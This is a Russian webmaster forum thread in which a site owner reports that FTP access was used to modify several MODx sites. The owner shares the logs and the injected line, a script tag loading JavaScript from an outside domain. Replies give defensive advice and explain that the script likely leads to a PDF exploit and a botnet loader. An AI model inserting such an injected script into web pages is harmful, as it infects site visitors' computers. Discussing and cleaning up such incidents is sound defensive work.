- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Ситуация следующая: есть несколько сайтов на modx. Сегодня, после того, как не получилось зайти в админку и выяснения сложившейся ситуации с хостером, получил логи такого вида
Tue Jun 9 23:14:49 2009 0 217.116.8.82 5528 /home/логин/сайт2/www/index.php a _ o r логин ftp 0 * c
Tue Jun 9 23:14:49 2009 0 217.116.8.82 5614 /home/логин/сайт2/www/index.php a _ i r логин ftp 0 * c
Tue Jun 9 23:14:49 2009 0 217.116.8.82 873 /home/логин/сайт2/www/assets/index.html a _ o r логин ftp 0 * c
Tue Jun 9 23:14:53 2009 0 217.116.8.82 959 /home/логин/сайт2/www/assets/index.html a _ i r логин ftp 0 * c
Tue Jun 9 23:14:57 2009 0 217.116.8.82 38278 /home/логин/сайт2/www/manager/index.php a _ o r логин ftp 0 * c
Tue Jun 9 23:14:58 2009 0 217.116.8.82 38364 /home/логин/сайт2/www/manager/index.php a _ i r логин ftp 0 * c
Tue Jun 9 23:14:58 2009 0 217.116.8.82 1100 /home/логин/сайт3/www/index.php a _ o r логин ftp 0 * c
Tue Jun 9 23:14:58 2009 0 217.116.8.82 1186 /home/логин/сайт3/www/index.php a _ i r логин ftp 0 * c
Tue Jun 9 23:14:59 2009 0 217.116.8.82 4724 /home/логин/сайт4.ru/www/index.php a _ o r логин ftp 0 * c
Tue Jun 9 23:14:59 2009 0 217.116.8.82 4811 /home/логин/сайт4.ru/www/index.php a _ i r логин ftp 0 * c
Tue Jun 9 23:14:59 2009 0 217.116.8.82 70 /home/логин/сайт4.ru/www/assets/index.html a _ o r логин ftp 0 * c
Tue Jun 9 23:15:00 2009 0 217.116.8.82 157 /home/логин/сайт4.ru/www/assets/index.html a _ i r логин ftp 0 * c
Tue Jun 9 23:15:01 2009 0 217.116.8.82 37475 /home/логин/сайт4.ru/www/manager/index.php a _ o r логин ftp 0 * c
Tue Jun 9 23:15:02 2009 0 217.116.8.82 37562 /home/логин/сайт4.ru/www/manager/index.php a _ i r логин ftp 0 * c
и т.д. по всем сайтам.
После сравнения замененных файлов с исходными, оказалось, что все 3 отличаются только 1 добавленной строкой (была добавлена в самый конец всех файлов) -
<script LANGUAGE="javascript" SRC="http://www.difusionjuridica.es/img/top.js"></script>
p.s. если тема не в том разделе, прошу перенести
Мой совет:
1. Проверьте свой компьютер на вирусы, а так же все компьютеры с которых был доступ к ftp.
2. Смените все пароли FTP.
3. Никогда не сохраняйте пароли в FTP-клиентах и лучше пароли переодически менять.
Так же можно закрыть доступ к FTP для всех ip-адресов, кроме своих.
Мой совет:
1. Проверьте свой компьютер на вирусы, а так же все компьютеры с которых был доступ к ftp.
2. Смените все пароли FTP.
3. Никогда не сохраняйте пароли в FTP-клиентах и лучше пароли переодически менять.
Так же можно закрыть доступ к FTP для всех ip-адресов, кроме своих.
1 в процессе, 2 - уже сделано, как сделать запрет для чужих ip, оставив только свои?
мне ТП хостера вот такой вот файлик сделали:
.ftpaccess
<Limit ALL>
Deny from 217.116.8.82
</Limit>
<Limit ALL>
Deny from 217.116.8.82
</Limit>
Это запрещает доступ с 1 ip-адреса.
Узнайте ip-адреса вашего провайдера и попросите хостера открыть доступ только для них. Для остальных пусть закроет. Ну и обновляйте антивирус регулярно)
По-моему, лучше запретить доступ всем, но разрешить со своего ip-адреса...
По-моему, лучше запретить доступ всем, но разрешить со своего ip-адреса...
Помоему, я это уже написал 😂
Благодарю за советы, а какова цель данных действий? судя по тому, что был доступ по фтп, запросто могли повесить страничку "этот сайт взломал %nickname%", однако этого не сделали, а внедрили какой-то скрипт.
Благодарю за советы, а какова цель данных действий? судя по тому, что был доступ по фтп, запросто могли повесить страничку "этот сайт взломал %nickname%", однако этого не сделали, а внедрили какой-то скрипт.
Это вирус. Возможно он заражает таким образом другие компьютеры с вашего сайта...
Да обычный вирус. Так часто бывает. Чистите комп от вирусов.
Благодарю за советы, а какова цель данных действий? судя по тому, что был доступ по фтп, запросто могли повесить страничку "этот сайт взломал %nickname%", однако этого не сделали, а внедрили какой-то скрипт.
в страницу сайта внедрили невидимый iframe который вставляет код с другого сайта, код содержит javascript эксплуатирующий PDF уязвимость. Исполняется код который подгружает на зараженный компьютер так называемы лоадер. Пораженный комп становится частью ботнета.
Кстати, как выяснили на днях, MODx уязвим и легко взламывается, при некоторых условиях.